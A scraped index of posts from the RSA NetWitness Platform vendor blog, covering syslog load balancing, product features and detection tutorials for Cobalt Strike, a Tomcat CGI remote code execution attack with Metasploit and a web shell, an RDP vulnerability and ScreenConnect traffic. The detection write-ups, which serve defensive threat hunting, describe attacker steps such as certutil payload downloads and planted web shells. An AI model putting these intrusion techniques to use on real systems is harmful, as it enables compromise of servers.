Skip navigation
All Places > Products > RSA NetWitness Platform > Blog
1 2 3 Previous Next

RSA NetWitness Platform

530 posts

If you need to achieve HA through load balancing and failover for VLCs on AWS you can use the built-in AWS load balancer. I have tested this scenario so I am going to share the outcome here.

 

Before starting I need to state that VLCs failover/balancing  is not an RSA officially supported functionality. Furthermore this can only work with "push" collections such as syslog, snmp, etc. It does not work with "pull" collections such us Windows, Checkpoint, ODBC, etc. (at least not that I am aware of and I have personally never tested it).

 

That being said, let's get started.

 

As you may be aware, in AWS EC2 you have separate geographic areas called Regions (I am using US East - N.Virgina here) and within regions you have different isolated locations called Availability Zones.

 

 

We are going to leverage this concept and we will place two VLCs into two different Availability Zones. If one VLC fails we will have the VLC in the other Availability Zone to take over.

 

The following diagram helps understanding the scenario (for better clarity I omitted the data flow from the VLCs to the Log Decoder/s):

 

Assuming you have already deployed the two VLC instances, the next step to do is creating two different subnets and associate two different Availability Zones to each of them .

 

  • From the AWS Virtual Private Cloud (VPC) menu go to Subnets and start creating the two subnets:

 

 

  • Next we need to create a Target Group (from the EC2 menu) which will be used to route requests to our registered targets (the VLCs):

     

 

  • Finally we need to create the load balancer itself. For this specific test I have used a Network Load Balancer but I think an Application Load Balancer would work too. I selected an internal balancer. I chose syslog on TCP port 514 so I created a listener for that. Actually, the AWS load balancer does not support UDP so I was forced to use TCP, however I would have used syslog over TCP anyway as it is more robust and reliable and large syslog messages can be transferred (especially if it is a production environment). I also select the appropriate VPC and the Availability Zones (and subnets) accordingly.  

     

 

In the advanced health check settings I chose to use port 5671 (by default the balancer would have used the same as the listener, 514). The reason of using 5671 is because the whole log collection mechanism works with rabbitmq which uses this port. In fact the only scenario 514 would not work is when the VLC instance is down or if we stop the syslog collection. I think rabbitmq is more prone to failures and may fail in more scenarios, such as queues filling up because the decoder is not consuming the logs, full partitions, network issues, etc. 

 

 

  • Once the load balancer configuration is finished you will see something similar:

 

 

           We need to take note of the DNS A Record as this is what our event sources will use to send syslog traffic to.

 

  • Now to configure an event source to send syslog logs to the load balancer you just need to point the event source to the load balancer DNS A Record. As an example, for a Red Hat Linux machine you should edit the /etc/rsyslog.conf file as follow:

 

  

 

         We are using @@ because is TCP, for UDP it's just one @.

 

         Then we need to restart the rsyslog service as follow:

 

            --> service rsyslog restart (Red Hat 6)

            --> systemctl restart rsyslog (Red Hat 7)

 

  • To perform a more accurate and controlled test and demonstration, I am installing a tool on the same event source and I will push some rhlinux logs to the load balancer and see what happens. The tool is an RSA proprietary one and is called NwLogPlayer (more details here How To Replay Logs in RSA NetWitness ). It can be installed via Yum if you have enabled the RSA Netwitness repo:

 

   

 

      I also prepared a rhlinux sample logs file with 14000 events and I am going to inject these to the load balancer and       see what happens. Initially my Log Decoder LogStats page is empty:

 

  

 

     Then I start with the first push of the 14000 events:

 

 

     Now I can see the first 14000 events went to VLC2 (172.24.185.126)

 

      At my second push I can see the whole chuck going to VC1 (172.24.185.105)

 

      At the third push the logs went again to VLC2

 

     At the fourth push the logs went to VLC1

 

     At the fifth push, I sent 28000 events (almost simultaneously)  and they get divided to both VLCs

 

     This demonstrates that the load has been balanced equally between the two VLCs.

 

     Now I stop VLC1 (I actually stopped the rabbitmq-service on VLC1) and I push other 14000 logs:

 

     and again

 

     On both instances above VLC2 received the two chunks of 14000 logs since VLC1 was down. We can safely say            that Failover is working fine!

Note: This configuration is not officially supported by RSA customer support. 

I have recently been posting a number of blogs regarding the usage of the RSA NeWitness Platform to detect attackers within your environment. As the list of the blogs grow, it is becoming increasingly difficult to navigate through them easily. In order to combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.

 

 

 

 

 

 

 

Special thanks to Rui Ataide for his support and guidance for these posts.

Introduction

Cobalt Strike is a threat emulation tool used by red teams and advanced persistent threats for gaining and maintaining a foothold on networks. This blog post will cover the detection of Cobalt Strike based off a piece of malware identified from Virus Total:

 

NOTE: The malware sample was downloaded and executed in a malware VM under analysts constant supervision as this was/is live malware.

The Detection in NetWitness Packets

NetWitness Packets pulls apart characteristics of the traffic it sees. It does this via a number of Lua parsers that reside on the Packet Decoder itself. Some of the Lua parsers have option files associated with them that parse out additional metadata for analysis. One of these is the HTTP Lua parser, which has an associated HTTP Lua options file, you can view this by navigating to Admin  Services ⮞ Decoder ⮞ Config ⮞ Files - and selecting HTTP_lua_options.lua from the drop down. The option we are interested in for this blog post is the headerCatalog() - making this return true will register the HTTP Headers in the request and response under the meta keys:

  • http.request
  • http.response

 

And the associated values for the headers will be registered under:

  • req.uniq
  • resp.uniq

 

NOTE: This feature is not available in the default options file due to potential performance considerations it may have on the Decoder. This feature is experimental and may be deprecated at any time, so please use this feature with caution, and monitor the health of all components if enabling. Also, please look into the customHeader() function prior to enabling this, as that is a less intensive substitute that could fit your use cases.

 

There are a variety of options that can be enabled here. For more details, it is suggested to read the Hunting Guide - https://community.rsa.com/docs/DOC-62341.

 

These keys will need to be indexed on the Concentrator, and the following addition to the index-concentrator-custom.xml file is suggested:

<key description="HTTP Request Header" format="Text" level="IndexValues" name="http.request" defaultAction="Closed" valueMax="5000" />
<key description="HTTP Response Header" format="Text" level="IndexValues" name="http.response" defaultAction="Closed" valueMax="5000" />
<key description="Unique HTTP Request Header" level="IndexKeys" name="req.uniq" format="Text" defaultAction="Closed"/>
<key description="Unique HTTP Response Header" level="IndexKeys" name="resp.uniq" format="Text" defaultAction="Closed"/>

 

 

The purpose for this, amongst others, is that the trial version of Cobalt Strike has a distinctive HTTP Header that we, as analysts, would like to see: https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/. This HTTP header is X-Malware - and with our new option enabled, this header is easy to spot:

NOTE: While this is one use case to demonstrate the value of extracting the HTTP Headers, this metadata proves incredibly valueable across the board, as looking for uncommon headers can help lead analysts to uncover and track malicious activity. Another example where this was useful can be seen in one of the previous posts regarding POSH C2, whereby an application rule was created to look for the incorrectly supplied cachecontrol HTTP response header: https://community.rsa.com/community/products/netwitness/blog/2019/03/04/command-and-control-poshc2

 

Pivoting off this header and opening the Event Analysis view, we can see a HTTP GET request for KHSw, which was direct to IP over port 666 and had a low header count with no referrer - this should stand out as suspicious even without the initial indicator we used for analysis:

 

If we had decided to look for traffic using the Service Analysis key, which pulls apart the characteristics of the traffic, we would have been able to pivot of off these metadata values to whittle down our traffic to this as well:

 

Looking into the response for the GET request, we can see the X-Malware header we pivoted off of, and the stager being downloaded. Also, take notice of the EICAR test string in the X-Malware as well, this is indicative of a trial version of Cobalt Strike as well:

 

NetWitness Packets also has a parser to detect this string, and will populate the metadata, eicar test string, under the Session Analysis meta key (if the Eicar Lua parser is pushed from RSA Live) - this could be another great pivot point to detect this type of traffic:

 

Further looking into the Cobalt Strike traffic, we can start to uncover more details surrounding its behaviour. Upon analysis, we can see that there are multiple HTTP GET requests with no error (i.e. 200), and a content-length of zero, which stands out as suspicious behaviour - as well as this, there is a cookie that looks like a Base64 encoded string (equals at the end for padding) with no name/value pairs, cookies normally consist of name/value pairs, these two observations make the cookie anomalous:

 

Based off of this behaviour, we can start to think about how to build content to detect this type of behaviour. Heading back to our HTTP Lua options file on the Decoder, we can see another option named, customHeaders() - this allows us to extract the values of HTTP headers in a field of our choosing. This means we can choose to extract the cookie into a meta key named cookie, and content-length into a key named http.respsize - this allows us to map a specific HTTP header value to a key so we can create some content based off of the behaviours we previously observed:

 

After making the above change, we need to add the following keys to our index-concentrator-custom.xml file as well - these are set to the index level of, keys, as the values that can be returned are unbounded and we don't want to bloat the index:

<key description="Cookie" format="Text" level="IndexKeys" name="cookie" defaultAction="Closed"  />
<key description="HTTP Response Size" format="Text" level="IndexKeys" name="http.respsize" defaultAction="Closed" />

 

Now we can work on creating our application rules. Firstly, we wanted to alert on the suspicious GET requests we were seeing:

service = 80 && action = 'get' && error !exists && http.respsize = '0' && content='application/octet-stream'

And for the anomalous cookie, we can use the following logic. This will look for no name/value pairs being present and the use of equals signs at the end of the string which can indicate padding for Base64 encoded strings:

service = 80 && cookie regex '^[^=]+=*$' && content='application/octet-stream'

These will be two separate application rules that will be pushed to the Decoders:

 

Now we can start to track the activity of Cobalt Strike easily in the Investigate view. This could also potentially alert the analyst to other infected hosts in their environment. This is why it is important to analyse the malicious traffic and create content to track:

 

Conclusion

Cobalt Strike is a very malleable tool. This means that the indicators we have used here will not detect all instances of Cobalt Strike, with that being said, this is known common Cobalt Strike behaviour. This blog post was intended to showcase how the usage of the HTTP Lua options file can be imperative in identifying anomalous traffic in your environment whilst using real-world Live malware. The extraction of the HTTP headers, whilst a trivial piece of information, can be vital in detecting advanced tools used by attackers. This coupled with the extraction of the values themselves, can help your analysts to create more advanced higher fidelity content.

Preface
In order to prevent confusion, I wanted to add a little snippet before we jump into the analysis. The blog post
first goes over how the server became infected with Metasploit, it was using a remote execution CVE
against an Apache Tomcat Web Server, the details of which can be found here, https://nvd.nist.gov/vuln/detail/
CVE-2019-0232. Further into the blog post, details of Metasploit can be seen.

 

This CVE requires that the CGI Servlet in Apache Tomcat is enabled. This is not an abnormal servlet to be
enabled and merely requires the Administrator to uncomment a few lines in the Tomcat web.xml. This is a
normal administrative action to have taken on the Web Server:

  


Now, if the administrator has a .bat, or .cmd file in the cgi-bin directory on the Apache Tomcat Server. The
attacker can remotely execute commands as Apache will call cmd.exe to execute the .bat or .cmd file and
incorrectly handle the parameters passed; this file can contain anything, as long as it executes. So here as an
example, we place a simple .bat file in the cgi-bin directory:

 

From a browser, the attacker can call the .bat file and pass a command to execute due to the way the CGI
Servlet handles this request and passes the arguments:

 

From here, the attacker can create a payload using msfvenom and instruct the web server to download the Metasploit payload they had created:

 

The Detection in NetWitness Packets

RCE Exploit
NetWitness Packets does a fantastic job pulling apart the behaviour of network traffic. This allows analysts to
detect attacks even with no prior knowledge of them. A fantastic meta value for analysts to look at is windows
cli admin commands, this metadata is created when cli commands are detected; grouping this metadata with inbound
traffic to your web servers is a great pivot point to start looking for malicious traffic:

 

NOTE: Taking advantage of the traffic_flow_options.lua parser would be highly beneficial for your SOC. This parser allows you to define your subnets and tag them with friendly names. Editing this to contain your web servers address space for example, would be a great idea.

 

Taking the above note into account, your analysts could then construct a query like the following:
(analysis.service = 'windows cli admin commands') && (direction = 'inbound') && (netname.dst = 'webservers')
Filtering on this metadata reduces the traffic quite significantly. From here, we can open up other meta
keys to get a better understanding of what traffic is related to these windows cli commands. From the below
screenshot, we can see that this is HTTP traffic, with a GET request to a hello.bat file in the /cgi-bin/ directory,
there are also some suspicious looking queries associated with it that appear to reference command line
arguments:

 

At this point, we decide to reconstruct the raw sessions themselves as we have some suspicions surrounding
this traffic to see exactly what these HTTP sessions are. Upon doing so, we can see a GET request with the
dir command, and we can also see the dir output in the response - this will be what the windows cli admin
commands metadata was picking up on:

 

This traffic instantly stands out as something of interest and as being something that requires further
investigation. In order to get a holistic view of all data toward this server, we need to reconstruct our query, as
the windows cli admin commands metadata would have only picked up on the sessions where it saw CLI
commands, we are, however, interested in seeing it all. So we look at the metadata available for this session
and build a new query. This now allows us to see other interesting metadata and get a better idea of what the
attacker was doing. Looking at the Query meta key, we can see all of the attackers commands:

 

Navigating to the Event Analysis view, we can see the commands in the order they took place and reconstruct
what the attacker was doing. From here we can see a sequence of events whereby the attacker makes a
directory, C:\temp, downloads an executable called 2.exe to said directory, and subsequently executes it:

 

MSF File and Traffic

As we can see the attackers commands, we can also see the download for an executable they performed, a.exe. This means we can run a query and extract that file from the packet data as well. We run a simple query looking for a.exe
and we find our session. Also, take note of the user agent, why is certutil being used to download a.exe? This is also a great indicator of something suspicious:

 

We can also choose to switch to the File Analysis view and download our file(s). This would allow us to perform additional analysis on the file(s) in question:

 

Merely running a strings on one of these files yields a result of a domain this executable may potentially connect to:

 

As we also have another hostname to add to our analysis, we can now perform a query on just this hostname
to see if there is any other interesting metadata associated with it. Opening the session analysis meta key, we can see a myriad of interesting pivot points. We can group these pivot points together, or make combinations of them to whittle down the traffic to something more manageable:

NOTE: See the RSA IR Hunting guide for more details on these metadata values: https://community.rsa.com/docs/DOC-62341

 

Once we have pivoted down using some of the metadata above, we start to get down to a more manageable amount of sessions - continuing looking at the service analysis meta key we also observe some additional pieces of metadata of interest we can use to start reconstructing the sessions to get a better understanding of what this traffic is:

 

  • long connection
  • http no referer
  • http six or less headers
  • http post missing content-type
  • http no user-agent
  • watchlist file fingerprint

 

 

Opening these sessions up in the Event Analysis view, we can see an HTTP POST with binary data, and a 200 OK from the supposed Apache Server, we can also see the directory is the same as we saw from our strings analysis:

 

Continuing to browse through these sessions, yields more of the same:

 

Navigating back to the investigate view, it is also possible to see that the directory is always the same and the one we saw in our strings analysis:

 

NOTE: During the analysis, no beaconing pattern was observed, this can make the C2 harder to detect and requires continued threat hunting from your analysts to understand your environment and pick up on these types of anomalies.

 

Web Shell

Now we know that the Apache Tomcat Web Server is infected, we can look at all other traffic
associated with the Web Server and continue to monitor to see if anything else takes place, attackers like to keep
multiple entry points if possible. Focusing on our Web Server, we can also see a JSP page being accessed
that sounds odd, error2.jsp, and observe some additional queries:

 

Pivoting into the Event Analysis view and reconstructing the sessions, we can see a tasklist command being
executed:

 

And the subsequent response of the tasklist output. This is a Web Shell that has been placed on the server and
the attacker is also using to execute commands:

 

NOTE: For more information on Web Shells, see the following series: https://community.rsa.com/community/products/netwitness/blog/2019/02/12/web-shells-and-netwitness

 

It is important to note that just because you have identified one method of remote access, it does not mean that
is the only one, it is important to ascertain whether or not other access methods were made available by the
attacker.

 

The Detection in NetWitness Endpoint
As I preach in every blog post, the analyst should always log in every morning and check the following
three meta keys as a priority, IOC (Indicators of Compromise), BOC (Behaviours of Compromise), and EOC
(Enablers of Compromise). Looking at these keys, a myriad of pieces of metadata stand out as great places to
start the investigation, but let's place a focus on these three for now:

 

Let's take the downloads binary using certutil to start, and pivot into the Event Analysis view. Here we
can see the certutil binary being used to download a variety of the executable we saw in the packet data:

 

Looking into one of the other behaviours of compromise, http daemon runs command shell, we can also
see evidence of the bat file being requested and the associated commands, as well as the use of the Web
Shell, error2.jsp. It is also important to note that there is a request for the hello.bat prior to the remote code
execution vulnerability being exploited, this would be seen as legitimate traffic given that the server is working
as designed for the CGI-BIN scripts. It is down to the analyst to review the traffic and decipher whether or not
something malicious is happening, or whether this is by design of the server:

 

NOTE: Due to the nature of how the Tomcat server handles the vulnerable cgi-bin application and "legitimate" JSP files, you can see hello.bat as part of the tracking event as it's an argument passed to cmd.exe. However, with the error2.jsp, it is executed inside the Tomcat process, and only when the web shell spawns a new command shell to execute certain commands will you see cmd.exe being executed, and not every time error2.jsp is used. Having said that, the advantage for the defender is that even if not all of it is tracked, or leaves a visible footprint, at some point something will, this will/ could be the starting thread needed to detect the intrusion.

 

Coming back to the Investigate view we can see another interesting piece of metadata that would be of interest, creates remote service - let's pivot on this and see what took place:

Here we can see that cmd was used to create a service on our Web Server that would run a malicious binary dropped by the attacker in the c:\temp directory:

 

It is important to remember that as a defender, you only need to pick up on one of these artifacts leftover from
the attacker in order to start unraveling their activity.

 

Conclusion
With today's ever-changing landscape, it is becoming increasingly inefficient to create signatures for known
vulnerabilities and attacks. It is therefore far more important to pick up on behaviours of traffic that stand out as
abnormal, than generating signatures. As shown in this blog post, a fairly recent remote code execution CVE
was exploited, https://nvd.nist.gov/vuln/detail/CVE-2019-0232 - no signatures were required to pick up on this
as NetWitness pulls apart the behaviours, we just had to follow the path. Similarly, with Metasploit it is also very difficult to generate effective long life signatures that could detect this C2; performing
threat hunting through the data based on a foundation of analysing behaviours, will ensure that all knowns and
unknowns are effectively analysed.

 

It is also important to note that the packet traffic would typically be encrypted but we kept it in the clear for the purposes of this post, with that being said, the RCE exploit and Web Shell is easily detectable when NetWitness Endpoint tracking data is being ingested, and this allows the defender to have the necessary visibility if SSL decryption is not in place.

Summary

A vulnerability exists within Remote Desktop Services and may be exploited by sending crafted network requests using RDP. The result could be remote code execution on a victim system without any user authentication or interaction. The vulnerability, CVE-2019-0708, is not known to have been publicly executed, however, expectations are that it will. Follow the Microsoft advisory to patch vulnerable systems -- CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability.

 

Live Content

The RSA Threat Content Team has added detection for NetWitness packet customers based on the work of the NCC Group. To get the detection, update your Decoders with the latest version of the RDP Lua parser (dated May 22nd, 2019).

 

If an exploit has been detected, meta will be output to the NetWitness Investigation page for

 

ioc = ‘possible CVE-2019-0708 exploit attempt’

 

You may also see the exploitation by deploying rules to the NetWitness ESA product and viewing the Respond workflow for alerts. Deploy the following rules from Live to ESA:

 

  • RDP Inbound
  • RDP from Same Source to Multiple Destinations

 

RDP Inbound may catch the initial connection from the attacker. It’s expected the infection would be worm-like moving to internally networked systems. In that case, the second rule, RDP from Same Source to Multiple Destinations, may catch the behavior. Please note you must be monitoring lateral traffic within your network for this detection.

 

References:

In 11.3 the same NWE Agent can operate in Insights (free) or Advanced Mode . This change can be made by toggling a policy configuration in the UI and does not require agent reinstall or reboot. 

There could be both Insights and Advanced agents in a single deployment. Only agents operating in Advanced mode are accounted for licensing.

 

Feature

Comments

Insights

Advanced

Operating Systems Support

Release

Windows

MacOS

Linux

Basic scans

Inventory

11.3

4.x

Tracking scans

Continuous file,network,process,thread monitors

Registry monitor(Specific to windows)

11.3

4.x

Anomaly detection

Inline hooks, kernel hooks,suspicious threads,registry discrepancies

11.3

4.x

Windows Log Collection

Collect Windows Event Logs

11.3**

Threat Detection Content

Detection Rules /Reports

11.3

Risk score

Based on Threat Content Pack

11.3

4.x

File Reputation Service

File Intel ( 3rd Party Lookup)

11.3

4.x

Live Connect

Community Intel

11.3

4.x

Analyze module

Analysis of downloaded file

11.3

4.x

Blocking

Block an executable

11.3

4.x

Agent Protection

Driver Registry Protection / User Mode Kill Protection

11.3**

Powershell , Command-line ( input)

Report user interactions within a console session

11.3**

Process Visualization

Unique identifier (VPID) for process that uniquely identifies the entire process event chain 

 

11.3**

MFT Analysis

Future

4.x

Process Memory Dump

Future

4.x

System Memory Dump

Future

4.x

Request File

Future

4.x

Automatic File Downloads

Future

4.x

Standalone Scans

Future

4.x

RAR

Future

4.x

Containment

Future

4.x

API Support

Future

4.x

Certificate CRL Validation

Future

4.x

 

** - New Capabilities , these do not exist in 4.x

 

 

11.3 Key Endpoint Features 

Feature
Value
Details
1Advanced Endpoint Agent

Full and Continuous Endpoint Visibility

Advanced Threat Detection / Threat Hunting

Performs both kernel and user level analysis

  • Tracks Behaviors such as process creation,remote thread creation,relevant registry key modifications,executable file

    creation, processes that read documents (refer doc for the detailed list)

  • Tracks Network Events

  • Tracks Console Events ( commands typed into console like cmd)
  • Windows Log Collection
  • Detects Anomalies such as Image hooks , Kernel Hooks , Suspicious Threads , Registry Discrepancies
  • Retrieves lists of drivers, processes, DLLs, files (executables), services, autoruns,
  • Host file entries, scheduled tasks
  • Gathers security information such as network share, patch level, Windows tasks,logged in Users,bash history
  • Reports the hashes (SHA-256, SHA-1, MD5) and file size of all binaries (executables, libraries (DLL and .SO)and scripts found on the system
  • Reports details on certificate,signer,file description,executable sections,imported libraries etc

2Threat Content PacksDetection of adversary tactics and techniques ( MITRE ATT&CK matrix)See attached 11.3 Endpoint Rules spreadsheet
3Risk Scoring

Prioritized List of Risky Hosts /Files

Automated Incident Creation for Hosts /Files when risk threshold exceeds

Risk Score backed up with context of contributing factors

Rapid/Easy Investigation Workflow

Risk Scores are computed based on a proprietary scoring algorithm developed by RSA's Data Sciences team

The Scoring server considers takes multiple factors into consideration for scoring

  • Critical , high ,medium indicators generated by the endpoints based on the threat content packs deployed
  • Reputation status of files - Malicious / Suspicious
  • Bias status of file - Blacklisted /Greylisted /Whitelisted
4Process Visualizations

Provides a visualization of a process and its parent-child relationships

Timeline of all activities related to a process

 

5

File Analysis/Reputation/Bias Status

Categorize Files

Saves Analysis time , Filter Out Noise , Focus on Real threats

File hashes from the environment are sent to RSA Threat Intel Cloud for reputation status updates

Live connect Lookup in Investigations

6Response Actions - File BlockingAccelerate Response /Prevent Malware ExecutionBlocks File Hash across the environment
7Response Actions - Retrieve Files

Download and Analyze File Contents for Anomalies

Static Analysis using 3rd Party Tools

8Centralized Group Policy Management

Agent Configurations Updated Dynamically Based on Group Membership

Groups can be created based on different criteria such as IP Address,Host names,Operating System Type,Operating Description

Endpoint Policies such as Agent Mode ,Scan Schedule , Server Settings , Response Actions can be automatically pushed based on group membership

Agents can be migrated to different Endpoint Servers based on Group/Policy Assignment

9Geo Distributed Scalable DeploymentConsolidated view & management of endpoints /files and the associated risk across distributed deployments

Strides have been made in RSA NetWitness Platform v11.2 to provide an administrator alternatives to the standard proprietary NW database format. Now an admin can choose to have the raw packet database files written in PcapNg format allowing them to be directly accessible using third party tools like Wireshark.

 

To enable storing the raw packet data as PcapNg files, the setting packet.file.type in the network decoder database configuration node has to be changed from netwitness to pcapng. After making this change a restart of the service is not required unless you are too impatient for the existing database file (default size is 4GB) to roll-over.

 

PcapNg configuration

 

Once the change is applied any new PCAPs uploaded or network traffic ingested into the decoder will be stored as pcapng files. Now as the database files age they are more readily available while on the decoder and when backed up off the system. In the below image you can see a mixture of the formats commingling in the packet database folder. The database written format can be changed between the two options without any loss of standard functionality.

 

pcapng files

 

There are some considerations before making the switch to PcapNg format over the default nwpdb format. The PcapNg format requires approximately 5% more storage when compared to the nwpdb format. The PcapNg format is not recommended to be used when ingest rates are greater than 8 Gbps on a single decoder as can introduce approximately 5% packet drops compared to when nwpdb is in use. The PcapNg files cannot be compressed while nwpdb files can, although in general raw network data typically does not compress well compared to raw logs. The PcapNg format is an open format while the nwpdb files are in a proprietary format so as accessibility improves, privacy concerns may arise when storing as PcapNg files. However, I am not suggesting security through obscurity is the right answer when measuring your GDPR compliance.

 

Hopefully this along with the already available SDK and APIs make NetWitness data more accessible.

One of the more common requests and "how do I" questions I've heard in recent months centers around the Emails that the Respond Module can send when an Incident is created or updated.  Enabling this configuration is simple (https://community.rsa.com/docs/DOC-86405), but unfortunately changing the templates that Respond uses when it sends one of these emails has not been an option.

 

Or rather...has not been an accessible option.  I aim to fix that with this blog post.

 

Before getting into the weeds, I should note that this guide does not cover how to include *any* alert data within incident notification emails. The fields I have found in my tests that can be included are limited to these using JSON dot notation (e.g. "incident.id", "incident.title", "incident.summary", etc.):

 

Now, this does not necessarily mean it isn't possible to include other data, just that I have not figured out how...yet.

 

The first thing we need to do is create a new Notification Template for Respond to use.  We do this within the UI at Admin / System / Global Notifications --> Templates tab.  I recommend using either of the existing Respond Notification templates as a base, and then modifying either/both of those as necessary. (I have attached these OOTB notification templates to this blog.)

 

For this guide, I'll use the "incident-created" template as my base, and copy that into a new Notification Template in the UI.  I give my template an easy-to-remember name, choose any of the default Template Types from the dropdown - it does not matter which I choose, as it won't have any bearing on the process, but it's a required field and I won't be able to save the template without selecting one - and write in a description:

 

Then I copy the contents of the "incident-created" template into the Template field.  The first ~60% of this template is just formatting and comments, so I scroll past all that until I find the start of the HTML <body> tag.  This is where I'll be making my changes

 

One of the more useful changes that comes to mind here is to include a hyperlink in the email that will allow me to pivot directly from the email to the Incident in NetWitness.  I can also change any of the static text to whatever fits my needs.  Once I'm done making my changes, I save the template.

 

After this, I'm done in the UI (unless I decide to make additional changes to my template), and open a SSH session to the NetWitness Admin Server.  To make this next part as simple and straightforward as I can, I've written a script that will prompt me for the name of the Template I just created, use that to make a new Respond Notification template, and then prompt me one more time to choose which Respond Notification event (Created or Updated) I want to apply it to. (The script is attached to this blog.)

 

A couple notes on running the script:

  1. Must be run from the Admin Server
  2. Must be run as a superuser

 

Running the script:

 

...after a wall of text because my template is fairly long...I get a prompt to choose Created or Updated:

 

And that's it!  Now, when a new incident gets created (either manually or automatically) Respond sends me an email using my custom Notification Template:

 

And if I want to update or fix or modify it in any way, I simply make my changes to the template within the UI and then run this script again.

 

Happy customizing.

Hi Everyone,

We're excited to share our second issue of the RSA NetWitness Platform newsletter with you.  As a friendly reminder, the goal for this newsletter is to share more information about what is happening and what key things you should be aware of regarding our products and services.

 

This is a monthly newsletter, so you can expect the next newsletter in early June.  If you have any specific topics you would like to see in a future newsletter, please let us know!

 

Previous Newsletters:

 

 

Note: You can hit "preview" to view the pdf newsletter in your browser window, without needing to download it. 

One of the features included in the RSA NetWitness 11.3 release is something called Threat Aware Authentication (Respond Config: Configure Threat Aware Authentication).  This feature is a direct integration between RSA NetWitness and RSA SecurID Access that enables NetWitness to populate and manage a list of potentially high-risk users that SecurID Access can then refer to when determining whether (and how) to require those users to authenticate.

 

The configuration guide above details the steps required to implement this feature in the RSA NetWitness Platform, and the relevant SecurID documentation for the corresponding capability is here: Determining Access Requirements for High-Risk Users in the Cloud Authentication Service.

 

On the NetWitness side, to enable this feature you must be at version 11.3 and have the Respond Module enabled (which requires an ESA), and on the SecurID Access side, you need to have Premium Edition (RSA SecurID Access Editions - check the Access Policy Attributes table at the bottom of that page).

 

At a high level, the flow goes like this:

  1. NetWitness creates an Incident
  2. If that Incident has an email address (one or more), the Respond module sends the email address(es) via HTTP PUT method to the SecurID Access API
  3. SecurID Access checks the domains of those email addresses against its Identity Sources (AD and/or LDAP servers)
  4. SecurID Access adds those email addresses with matching domains to its list of High Risk Users
  5. SecurID Access can apply authentication policies to users in that list
  6. When the NetWitness Incident is set to Closed or Closed-False Positive, the Respond module sends another HTTP PUT to the SecurID Access API removing the email addresses from the list

 

In trying out these capabilities, I ended up making a couple tools to help report on some of the relevant information contained in NetWitness and SecurID Access.

 

The first of these is a script (sidHighRiskUsers.py; attached at the bottom of this blog) to query the SecurID Access API in the same way that NetWitness does.  This script is based on the admin_api_cli.py example in the SecurID Access REST API tool (https://community.rsa.com/docs/DOC-94122).  That download contains all the python dependencies and modules necessary to interact with the SecurID API, plus some helpful README files, so if you do intend to test out this capability I recommend giving that a look.

 

Some usage examples of this script (can be run with either python2 or python3 or both, depending on whether you've installed all the dependencies and modules in the REST API tool):

 

Show Users Currently on the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o getHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>"

 

 

Add  Users to the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o addHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>" -e <single_or_multiple_email_address>

 

**Note: my python-fu is not strong enough to capture/print the 404 response from the API if you send a partially successful PUT.  If your python-fu is strong, I'd love to know how to do that correctly.

Example - if you try to add multiple user emails and one or more of those emails are not in your Identity Sources, you should see this error for the invalid email(s):

 

Remove Users from the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o removeHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>" -e <single_or_multiple_email_address>

 

*Note: same as above about a partially successful PUT to the API

 

The second tool is another script (nwHighRiskUsersReport.sh; also attached at the bottom of this blog) to help report on the NetWitness-specific information about the users added to the High Risk list, the Incident(s) that resulted in them being added, and when they were added.  This script should be run on a recurring basis in order to capture any new additions to the list - the frequency of that recurrence will depend on your environment and how often new incidents are created or updated.

 

The script will create a CEF log for every non-Closed incident that has added an email to the High Risk list, and will send that log to the syslog receiver of your choice.  Some notes on the script's requirements:

  1. must be run as a superuser from the Admin Server
  2. the Admin Server must have the rsa-nw-logplayer RPM installed (# yum install rsa-nw-logplayer)
  3. add the IP address/hostname and port of your syslog receiver on lines 4 & 5 in the script
  4. If you are sending these logs back into NetWitness:
    1. add the attached cef-custom.xml to your log decoder or existing cef-custom.xml (details and instructions here: Custom CEF Parser)
    2. add the attached table-map-custom.xml entries to the table-map-custom.xml on all your Log Decoders
    3. add the attached index-concentrator-custom.xml entries to the index-concentrator-custom.xml on all your Concentrators (both Log and Packet)
    4. restart your Log Decoder and Concentrator services
    5. **Note: I am intentionally not using any existing email-related metakeys in these custom.xml files in order to avoid a potential feedback loop where these events might end up in other Incidents and the same email addresses get re-added to the High Risk list
  5. Or if you are sending them to a different SIEM, perform the equivalent measures in that platform to add custom CEF keys

 

Once everything is ready, running the script:

 

And the results:

------

With the recent news about ScreenConnect used in data breaches, I had the opportunity to examine some of the network traffic.  This was traffic that was originally in OTHER, but as you know, that just means it's an opportunity to learn about some new aspect of our networks.

 

Initially, this traffic was over TCP dest port 443, however it was not SSL traffic.  A custom parser was written to identify this traffic and register the service type as 7310.  I did not find a document that explained how the application used this custom protocol, so I built this parser with some educated guesswork.

 

 

We start with an 18 byte long token and match on it within the first 10 bytes of the payload.  If we see that, we are in the right traffic.  Next, I moved forward 1 byte and then extracted the next 64 bytes of payload.  I checked the first byte using the "payload:uint8(1,1)" method looking for either a "4" or a "6".  In researching this traffic, it appeared that different versions of ScreenConnect would have one of those values.  That value was important as it led me to determine where the hostname (or IP address) started and it's terminator.

 

 

If the value was "4", then my hostname started 7 bytes away.  If the value was "6", the hostname started 9 bytes away.  It also helped me identify the terminator.  If the initial value was "4" my terminator appeared to be "0x01".  If the initial value was "6" then the terminator appeared to be "0x02".  

 

Now that I was able to identify the start and end positions, I could extract the hostname.  However, it could be either an IP address or a fully qualified domain name.  This is where I referenced an outside function in the 'nwll' file called "determineHostType".  This way, if the extracted value was an IP address, it would be placed in 'alias.ip' and if it was a hostname, it would go in 'alias.host'.

 

Attached is the parser and PCAP.  This parser was submitted to LIVE, however I wanted you to have it while that process is underway.

 

Good luck and happy hunting.

 

Chris

Attackers love to use readily available red team tools for various stages within their attack. They do so as this removes the labour required in creating their own custom tools. This is not to say that the more innovative APT's are going down this route, but just something that appears to be becoming more prevalent and your analysts should be aware of. This blog post covers a readily available red team tool available on GitHub.

 

Tools

In this blog post, the Koadic C2 will be used. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 

 

The Attack

